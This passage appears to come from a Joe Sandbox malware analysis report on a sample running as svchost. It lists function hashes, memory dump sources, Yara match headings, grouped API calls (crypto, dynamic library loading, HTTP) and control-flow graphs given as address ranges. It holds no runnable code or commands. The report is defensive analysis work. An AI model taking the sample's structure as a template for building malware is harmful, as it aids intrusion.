          • Instruction ID: 68c8fbabcff802c526084c53bb8964246dfaaeb998f36def65cd26f4996e6266
          • Opcode Fuzzy Hash: 09873fec92877f518c362985b5da0a46ce3d3219a83bb375dbd9e82aa2709a25
          • Instruction Fuzzy Hash: 3AA145B2301B4085FB52DF67E4603EA33A5F788BD8F048529AF5857BA9DF34C845A750
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
          • String ID:
          • API String ID: 1445889803-0
          • Opcode ID: ca367986e5882e155562448106f5efe6e8986abbd5978ec8722d427d7b5e0517
          • Instruction ID: 4282b2ffed1f1902788247a1ead55fe5c5022d60fe0a4bff3f2e92ceacb5a284
          • Opcode Fuzzy Hash: ca367986e5882e155562448106f5efe6e8986abbd5978ec8722d427d7b5e0517
          • Instruction Fuzzy Hash: CC012D31215B4486FB928F22E9843956360F74DBD0F446624FFAE4B7B4DA3DCA998740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$AddressFileLibraryLoadProcRead
          • String ID:
          • API String ID: 387921010-0
          • Opcode ID: eadf0efd34f26277e8400af0cfcc570356fd1329ee8f58013c18fc709ca27727
          • Instruction ID: cba2ec3feea0474adde51f7879ad5c737c0c375ffbddc39dfdd9f5c2093ba4f8
          • Opcode Fuzzy Hash: eadf0efd34f26277e8400af0cfcc570356fd1329ee8f58013c18fc709ca27727
          • Instruction Fuzzy Hash: 56D15C32604B9586EB21CF66E8503EA77A0F788BC8F544126EF8D4BBA9DF39C545C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressContextCryptFreeHeapLibraryLoadProcReleasememcpy
          • String ID:
          • API String ID: 2867732488-0
          • Opcode ID: 9a26799eaaf4163cc504d9e91266e7a0b919504d3ea1120257a67cb58b92511a
          • Instruction ID: 2db249bd383248aba45334d7a8506845dbe1c60679b5032ff9891b2fde60f497
          • Opcode Fuzzy Hash: 9a26799eaaf4163cc504d9e91266e7a0b919504d3ea1120257a67cb58b92511a
          • Instruction Fuzzy Hash: 87512532B01B4589EB51CB62E844B9D7BA9FB88B88F14402ADF4C57B68DF38C445C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressContextCryptFreeHeapLibraryLoadProcRelease
          • String ID:
          • API String ID: 3850130045-0
          • Opcode ID: 145929a3609508ac8404060b31b796e4061ef22d857f2634ef8391897ab5f1ff
          • Instruction ID: 19954f6952f382fe07ad367a4b777b92ae69b62c1249c18f4d2fda55ef73c1ac
          • Opcode Fuzzy Hash: 145929a3609508ac8404060b31b796e4061ef22d857f2634ef8391897ab5f1ff
          • Instruction Fuzzy Hash: 4A413D7671178586EB61DF16E494BAA77A4F7C8B84F048126EF8D87764CF38C845CB40
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressProcmemset
          • String ID:
          • API String ID: 4219566340-0
          • Opcode ID: 73a227b09f757a1249d5b25b467e9ad04729ed7ee61bc8e6451ac5836c3fc14c
          • Instruction ID: 428b3f066b109f255c39e2ebfc4fbc54e526bd0559da4fecb65a859fdc128361
          • Opcode Fuzzy Hash: 73a227b09f757a1249d5b25b467e9ad04729ed7ee61bc8e6451ac5836c3fc14c
          • Instruction Fuzzy Hash: 8491FBB22116C595EF32CF26E8507EE37A0F7497C8F448012F7498BAA9DB79CA05C340
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ExceptionFilterUnhandled
          • String ID:
          • API String ID: 3192549508-0
          • Opcode ID: 6232d811d3cfb7e92c117290181e80137c246c2343d6329668bcc7e7c22aaeff
          • Instruction ID: b14e74fb3442ca454c0f05d9baab849c330a8665264c7a09ccb05e29302e0afa
          • Opcode Fuzzy Hash: 6232d811d3cfb7e92c117290181e80137c246c2343d6329668bcc7e7c22aaeff
          • Instruction Fuzzy Hash: 67B01271B51400D1D606AB23DCC23C012F4675C350FD00410D60D8A130DB3D83EFC700

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 844 1400065d0-140006636 846 140006a66-140006a7e 844->846 847 14000663c-140006644 844->847 848 140006a86-140006a8e 846->848 849 140006a80 SysFreeString 846->849 847->846 850 14000664a-14000665a 847->850 851 140006a96-140006a9e 848->851 852 140006a90 SysFreeString 848->852 849->848 850->846 858 140006660-140006674 850->858 853 140006aa6-140006aae 851->853 854 140006aa0 851->854 852->851 856 140006ab6-140006ac3 853->856 857 140006ab0 853->857 854->853 857->856 858->846 860 14000667a-1400066f2 call 14000e580 * 4 858->860 869 1400066f8-1400066fb 860->869 870 140006a3c-140006a47 860->870 871 140006701-140006704 869->871 872 140006a25-140006a36 HeapFree 869->872 873 140006a49-140006a58 HeapFree 870->873 874 140006a5e 870->874 871->872 875 14000670a-14000670d 871->875 872->870 873->874 874->846 875->872 876 140006713-140006730 875->876 877 140006736-140006751 876->877 878 140006ad7-140006ade 876->878 879 140006756-14000675e 877->879 880 140006af2-140006af9 878->880 881 140006ae0-140006aec HeapFree 878->881 882 140006766-140006773 879->882 883 140006760 SysFreeString 879->883 884 140006afb-140006b07 HeapFree 880->884 885 140006b0d-140006b43 call 14000e580 * 2 880->885 881->880 887 140006775 SysFreeString 882->887 888 14000677b-140006795 882->888 883->882 884->885 895 140006b45-140006b4e 885->895 896 140006b8c-140006b93 885->896 887->888 893 14000679b-1400067b0 888->893 894 140006a0e-140006a1d 888->894 893->894 901 1400067b6-1400067d5 call 14000e0c0 893->901 894->872 897 140006b51-140006b8a 895->897 899 140006b95-140006ba1 HeapFree 896->899 900 140006ba7-140006bae 896->900 897->896 897->897 899->900 902 140006bc2-140006bdb 900->902 903 140006bb0-140006bbc HeapFree 900->903 906 1400067f6-140006813 901->906 907 1400067d7 901->907 903->902 910 140006819-14000682e 906->910 911 14000698a-1400069ad 906->911 908 1400067e0-1400067f4 907->908 908->906 908->908 910->894 914 140006834-140006856 call 14000c8c0 910->914 915 1400069b3-1400069b8 911->915 916 140006ac4-140006ad2 911->916 919 14000685c-140006892 _wtoi call 14000caf0 914->919 920 1400069bd-1400069c4 914->920 915->879 916->878 929 1400068c4-1400068dc HeapFree 919->929 930 140006894 919->930 921 1400069f4-1400069f7 920->921 922 1400069c6 920->922 921->894 926 1400069f9-140006a08 HeapFree 921->926 924 1400069d0-1400069db 922->924 927 1400069dd-1400069e9 HeapFree 924->927 928 1400069ef-1400069f2 924->928 926->894 927->928 928->921 928->924 932 1400068e0-1400068fd rand 929->932 931 1400068a0-1400068ab 930->931 933 1400068ad-1400068b9 HeapFree 931->933 934 1400068bf-1400068c2 931->934 935 140006911-140006914 932->935 936 1400068ff 932->936 933->934 934->929 934->931 937 140006916-14000691e 935->937 938 140006927-14000692f 935->938 939 140006900-140006905 936->939 937->932 940 140006920-140006925 937->940 941 140006936-14000693c 938->941 939->935 942 140006907-14000690f 939->942 940->941 941->911 943 14000693e-140006945 941->943 942->935 942->939 943->911 944 140006947 943->944 945 140006950-140006960 944->945 946 140006962 945->946 947 140006976-140006979 945->947 948 140006965-14000696a 946->948 949 140006984-140006987 947->949 950 14000697b-140006980 947->950 948->947 951 14000696c-140006974 948->951 949->911 950->945 952 140006982 950->952 951->947 951->948 952->911
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$AddressProcString$Allocate$LibraryLoadProcess_wtoirand
          • String ID:
          • API String ID: 2238110293-0
          • Opcode ID: 2c2506c9d29a3b2e37dadef24b2f3c2898cd3c267f0d8796ce2abf700301f374
          • Instruction ID: 4a3659216eab84ee89323299ad5868aa41759a22a73ed70f653af329964e58fc
          • Opcode Fuzzy Hash: 2c2506c9d29a3b2e37dadef24b2f3c2898cd3c267f0d8796ce2abf700301f374
          • Instruction Fuzzy Hash: FFF16DB2304B8186EB62DF26E9403EA63A5F78DBC4F148015EB8E67B69DF39C545C701

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1043 14000b7d0-14000b838 1045 14000b83e-14000b846 1043->1045 1046 14000bca0-14000bcb8 1043->1046 1045->1046 1047 14000b84c-14000b85c 1045->1047 1048 14000bcba SysFreeString 1046->1048 1049 14000bcc0-14000bcc8 1046->1049 1047->1046 1057 14000b862-14000b876 1047->1057 1048->1049 1050 14000bcca SysFreeString 1049->1050 1051 14000bcd0-14000bcda 1049->1051 1050->1051 1053 14000bce2-14000bcea 1051->1053 1054 14000bcdc 1051->1054 1055 14000bcf2-14000bcff 1053->1055 1056 14000bcec 1053->1056 1054->1053 1056->1055 1057->1046 1059 14000b87c-14000b8d8 call 14000e580 * 3 1057->1059 1066 14000bc5c-14000bc67 1059->1066 1067 14000b8de-14000b8e1 1059->1067 1068 14000bc69-14000bc78 HeapFree 1066->1068 1069 14000bc7e-14000bc81 1066->1069 1070 14000b8e7-14000b903 1067->1070 1071 14000bc40-14000bc57 HeapFree 1067->1071 1068->1069 1072 14000bc83-14000bc92 HeapFree 1069->1072 1073 14000bc98 1069->1073 1074 14000b909-14000b917 1070->1074 1075 14000bb6f-14000bb76 1070->1075 1071->1066 1072->1073 1073->1046 1076 14000b920-14000b928 1074->1076 1077 14000bb78-14000bb84 HeapFree 1075->1077 1078 14000bb8a-14000bb91 1075->1078 1079 14000b92a SysFreeString 1076->1079 1080 14000b930-14000b93d 1076->1080 1077->1078 1081 14000bb93-14000bb9f HeapFree 1078->1081 1082 14000bba5-14000bbd9 call 14000e580 * 2 1078->1082 1079->1080 1083 14000b945-14000b961 1080->1083 1084 14000b93f SysFreeString 1080->1084 1081->1082 1092 14000bc27-14000bc2a 1082->1092 1093 14000bbdb-14000bbe7 1082->1093 1089 14000b967-14000b97e 1083->1089 1090 14000bc30-14000bc38 1083->1090 1084->1083 1089->1090 1096 14000b984-14000b9a3 call 14000e0c0 1089->1096 1090->1071 1092->1090 1094 14000bbf0-14000bc25 1093->1094 1094->1092 1094->1094 1099 14000b9a5 1096->1099 1100 14000b9c6-14000b9e3 1096->1100 1101 14000b9b0-14000b9c4 1099->1101 1103 14000bb33-14000bb58 1100->1103 1104 14000b9e9-14000ba00 1100->1104 1101->1100 1101->1101 1103->1076 1107 14000bb5e-14000bb6a 1103->1107 1104->1090 1108 14000ba06-14000ba2d call 14000c8c0 1104->1108 1107->1075 1111 14000ba33-14000ba5a _wtoi call 14000caf0 1108->1111 1112 14000bd00-14000bd02 1108->1112 1121 14000ba84-14000ba9c HeapFree 1111->1121 1122 14000ba5c 1111->1122 1113 14000bd34-14000bd37 1112->1113 1114 14000bd04 1112->1114 1113->1090 1117 14000bd3d-14000bd52 HeapFree 1113->1117 1116 14000bd10-14000bd1b 1114->1116 1119 14000bd1d-14000bd29 HeapFree 1116->1119 1120 14000bd2f-14000bd32 1116->1120 1117->1090 1119->1120 1120->1113 1120->1116 1123 14000baa0-14000babd rand 1121->1123 1124 14000ba60-14000ba6b 1122->1124 1125 14000babf 1123->1125 1126 14000bad0-14000bad3 1123->1126 1127 14000ba6d-14000ba79 HeapFree 1124->1127 1128 14000ba7f-14000ba82 1124->1128 1129 14000bac0-14000bac4 1125->1129 1130 14000bae1-14000bae4 1126->1130 1131 14000bad5-14000badd 1126->1131 1127->1128 1128->1121 1128->1124 1129->1126 1132 14000bac6-14000bace 1129->1132 1134 14000baeb-14000baf1 1130->1134 1131->1123 1133 14000badf 1131->1133 1132->1126 1132->1129 1133->1134 1134->1103 1135 14000baf3-14000baf8 1134->1135 1135->1103 1136 14000bafa 1135->1136 1137 14000bb00-14000bb10 1136->1137 1138 14000bb22-14000bb25 1137->1138 1139 14000bb12-14000bb16 1137->1139 1141 14000bb27-14000bb2c 1138->1141 1142 14000bb30 1138->1142 1139->1138 1140 14000bb18-14000bb20 1139->1140 1140->1138 1140->1139 1141->1137 1143 14000bb2e 1141->1143 1142->1103 1143->1103
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$AddressProcString$Allocate$LibraryLoadProcess_wtoirand
          • String ID:
          • API String ID: 2238110293-0
          • Opcode ID: 5ac5ed8ab6b7965b0a15b53e9b8ab694a50f8e425c364abc59f255adc166618d
          • Instruction ID: 24ed72427a13ddd5fcc77b1a0f8ca7dcc51255d65edbd16390ea418555290099
          • Opcode Fuzzy Hash: 5ac5ed8ab6b7965b0a15b53e9b8ab694a50f8e425c364abc59f255adc166618d
          • Instruction Fuzzy Hash: B4E15CB6201B8486EB62DF16E8507EA77A0FB89BC8F444025EF4E47B69DF39C545C700

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1144 140006100-140006188 call 140001fa0 1148 1400064f4-140006504 1144->1148 1149 14000618e-140006196 1144->1149 1152 140006506 SysFreeString 1148->1152 1153 14000650c-140006514 1148->1153 1150 14000619c-1400061ac 1149->1150 1151 1400064ee 1149->1151 1150->1148 1161 1400061b2-1400061c6 1150->1161 1151->1148 1152->1153 1154 140006516-140006519 SysFreeString 1153->1154 1155 14000651f-140006522 1153->1155 1154->1155 1156 140006524-140006527 SysFreeString 1155->1156 1157 14000652d-14000653f 1155->1157 1156->1157 1159 140006541 1157->1159 1160 140006547-14000654f 1157->1160 1159->1160 1162 140006551 1160->1162 1163 140006557-14000655a 1160->1163 1161->1148 1170 1400061cc-1400061db 1161->1170 1162->1163 1164 14000655c-14000655f 1163->1164 1165 14000657e-140006599 1163->1165 1167 140006562-14000657c SysFreeString * 2 1164->1167 1168 14000659b-1400065aa HeapFree 1165->1168 1169 1400065b0-1400065bf 1165->1169 1167->1165 1167->1167 1168->1169 1170->1151 1171 1400061e1-1400061e9 1170->1171 1172 1400061f1-1400061f9 1171->1172 1173 1400061eb SysFreeString 1171->1173 1174 140006204-14000620f 1172->1174 1175 1400061fb-1400061fe SysFreeString 1172->1175 1173->1172 1176 140006211-140006214 SysFreeString 1174->1176 1177 14000621a-140006220 1174->1177 1175->1174 1176->1177 1178 140006252-140006255 1177->1178 1179 140006222-140006228 1177->1179 1181 140006257-140006266 HeapFree 1178->1181 1182 14000626c-140006292 1178->1182 1180 140006230-14000624a SysFreeString * 2 1179->1180 1180->1180 1183 14000624c 1180->1183 1181->1182 1182->1148 1185 140006298-1400062af 1182->1185 1183->1178 1185->1148 1187 1400062b5-1400062d4 call 14000e0c0 1185->1187 1190 1400062f6-140006313 1187->1190 1191 1400062d6-1400062e5 1187->1191 1193 1400064c6-1400064e8 1190->1193 1194 140006319-14000632c call 140002190 1190->1194 1191->1190 1193->1151 1193->1171 1198 140006332-140006351 call 14000e0c0 1194->1198 1199 1400065c0-1400065ca 1194->1199 1202 140006353-140006374 1198->1202 1203 140006376-14000638a 1198->1203 1199->1148 1202->1203 1203->1148 1204 140006390-140006393 1203->1204 1205 1400063a0-1400063b7 1204->1205 1207 1400063b9-1400063c5 1205->1207 1208 1400063cc-1400063cf 1205->1208 1207->1205 1210 1400063c7 1207->1210 1208->1148 1209 1400063d5-1400063d8 1208->1209 1209->1148 1211 1400063de-140006410 SysAllocString call 14000e0c0 1209->1211 1210->1148 1214 140006412-140006426 1211->1214 1215 140006428-140006435 1211->1215 1214->1214 1214->1215 1216 140006440-140006457 1215->1216 1218 140006469-14000646c 1216->1218 1219 140006459-140006465 1216->1219 1221 140006484-140006497 ??2@YAPEAX_K@Z 1218->1221 1222 14000646e-140006471 1218->1222 1219->1216 1220 140006467 1219->1220 1220->1221 1224 140006499-1400064aa call 140001f50 1221->1224 1225 1400064ac 1221->1225 1222->1221 1223 140006473-140006481 SysAllocString 1222->1223 1223->1221 1227 1400064af-1400064be call 140002050 1224->1227 1225->1227 1227->1148 1231 1400064c0 1227->1231 1231->1193
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$Heap$??3@
          • String ID:
          • API String ID: 3062846050-0
          • Opcode ID: 25cf90377470c744e4eee7f6f1cc8f0c0b72b68b3d3dfc4207a14fcec5be35b2
          • Instruction ID: 567a171887cd63558544f340f6ae29d700814bafcf893e5afe614293ba1669bb
          • Opcode Fuzzy Hash: 25cf90377470c744e4eee7f6f1cc8f0c0b72b68b3d3dfc4207a14fcec5be35b2
          • Instruction Fuzzy Hash: B3D14D76201A8186EB62DF26E8503EE67A1F78CBC8F144125EF8E57B69DF39C549C700
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeStringtolower$_wtoi
          • String ID: mcco$mcco$run
          • API String ID: 3767767869-3413444080
          • Opcode ID: b6861136f8e326d3c042ad7c7da078c728545a6e6e7d1915c2030f11a707d94e
          • Instruction ID: 16d87dde47dbfec4f71874680f490213c2a4b8fef5ea2d831d7f44a55ef8ae21
          • Opcode Fuzzy Hash: b6861136f8e326d3c042ad7c7da078c728545a6e6e7d1915c2030f11a707d94e
          • Instruction Fuzzy Hash: 429148B6601A918AEB22DF32E4907EE37B1F749BDDF145115EF4A17A68CB36C885C700
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$CloseHandleHttp$??3@
          • String ID:
          • API String ID: 3500024125-0
          • Opcode ID: 119ff7e25ad4148979bb3aff6135a8682ecc72c0b94b38b8e4308b1bc6026636
          • Instruction ID: 7c82ee3f3e0be60d7d2ee0712700461a8a45a917594ce0937cf0833207fb0a1d
          • Opcode Fuzzy Hash: 119ff7e25ad4148979bb3aff6135a8682ecc72c0b94b38b8e4308b1bc6026636
          • Instruction Fuzzy Hash: F251E4B5600B8581EA86DB57E8543EA23A0FB8DFD5F04401AEF8D57776CE39C885C380
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: _time64
          • String ID:
          • API String ID: 1670930206-0
          • Opcode ID: b64c341f4c6a692dff2abba7590d2114a4e5d53f968345bcd9a99b1c3848285b
          • Instruction ID: 4b7130a5fe45b23e71bac91244d7ff03deac5bbb1559c1b7e8e26f4111e349c4
          • Opcode Fuzzy Hash: b64c341f4c6a692dff2abba7590d2114a4e5d53f968345bcd9a99b1c3848285b
          • Instruction Fuzzy Hash: 50126FB2600B8185FB63DF66E8503ED27A4F748BC8F444426EB4A976B6DF39CA45C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: _wtoi$FreeHeap_time64
          • String ID:
          • API String ID: 3473528173-0
          • Opcode ID: 7c303aa40e4e38331dc1585e2446f19d3a19a6b9c713990f762f01dcb679d952
          • Instruction ID: 3e492c6d30ee683ac932d30f26eaa9c73d21aea8094979f73a7135df6a82422b
          • Opcode Fuzzy Hash: 7c303aa40e4e38331dc1585e2446f19d3a19a6b9c713990f762f01dcb679d952
          • Instruction Fuzzy Hash: 2D026EB2600B8195FB62DF62E8503ED27A4F748BC8F444426EB4A976B9DF39C945C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: _time64
          • String ID:
          • API String ID: 1670930206-0
          • Opcode ID: b7efe617559e2eb79c2949e20eda16229f9fe8d4dbbeed2f454843320d0cd5ce
          • Instruction ID: e20eebbb1c51daf8925e8ddc921a0e42dda1ff119c888ec2a9f7eee73c6ad8fd
          • Opcode Fuzzy Hash: b7efe617559e2eb79c2949e20eda16229f9fe8d4dbbeed2f454843320d0cd5ce
          • Instruction Fuzzy Hash: C3026EB2600B8195FB62DF63E8503ED27A4F748BC8F444426EB4A976BADF39C945C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$Heap
          • String ID:
          • API String ID: 4134718113-0
          • Opcode ID: 7302ecce643bb001c8937cf8e71a960d646b8d06111705271868ac4a7d8ec183
          • Instruction ID: 5bbe0f4e1f777998957cbe3a4eb7b9395ba18578963b24f341d411ea742c8042
          • Opcode Fuzzy Hash: 7302ecce643bb001c8937cf8e71a960d646b8d06111705271868ac4a7d8ec183
          • Instruction Fuzzy Hash: 22D15E36214A9586EB52DF26E8503EE67A0FB8DBC8F144015FF8A4BB68DF7AC545C700
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
